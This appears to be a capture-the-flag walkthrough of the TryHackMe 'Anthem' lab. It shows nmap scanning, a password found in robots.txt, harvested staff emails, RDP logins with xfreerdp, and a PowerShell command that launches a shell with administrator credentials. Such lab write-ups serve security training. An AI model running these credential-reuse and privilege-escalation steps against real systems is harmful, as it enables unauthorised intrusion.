Anthem

Posted on | In

You can find this machine here : https://tryhackme.com/room/anthem

Port Scan

1
2
3
4
5
6
┌──(kali㉿Zeus)-[~]
└─$ sudo nmap -Pn 10.10.24.60                  

PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server

image

Information Gathering

Domain Name

1
2
3
┌──(kali㉿Zeus)-[~]
└─$ cat /etc/hosts | grep com
10.10.24.60     anthem.com

Robots.txt & Password

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿Zeus)-[~]
└─$ curl http://anthem.com/robots.txt
UmbracoIsTheBest!

# Use for all search robots
User-agent: *

# Define the directories not to crawl
Disallow: /bin/
Disallow: /config/
Disallow: /umbraco/
Disallow: /umbraco_client/

Users & Emails

image

image

1
2
3
4
5
James Orchard Halliwell
Jane Doe
JD@anthem.com
Solomon Grundy
SG@anthem

User Owned

1
xfreerdp /f /v:anthem.com /u:'sg'  /p:'Umbraco<REMOVED>Best!'

image

File Enumeration & Change Permissions

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
C:\Users\SG>dir C:\ /a:h /b /s
C:\$Recycle.Bin
C:\backup
C:\Documents and Settings
C:\pagefile.sys
C:\Recovery
C:\System Volume Information
C:\$Recycle.Bin\S-1-5-21-3886845925-2521176483-1368255183-500
C:\Program Files\desktop.ini
C:\Program Files\Uninstall Information
C:\Program Files\Windows Sidebar
C:\Program Files\WindowsApps
C:\Program Files (x86)\desktop.ini
C:\Program Files (x86)\Uninstall Information
C:\Program Files (x86)\Windows Sidebar
C:\ProgramData\Application Data
C:\ProgramData\Desktop
C:\ProgramData\Documents
<snip>

image

image

image

1
ChangeMe<REMOVED>1MoreTime

System Onwed

1
2
3
$secpasswd = ConvertTo-SecureString -AsPlainText -Force -String ChangeMe<REMOVED>1MoreTime
$mycreds = New-Object System.Management.Automation.PSCredential ("administrator", $secpasswd)
Start-Process powershell.exe -Credential $mycreds

or

1
xfreerdp /f /v:anthem.com /u:'administrator'  /p:'ChangeMe<REMOVED>1MoreTime'

image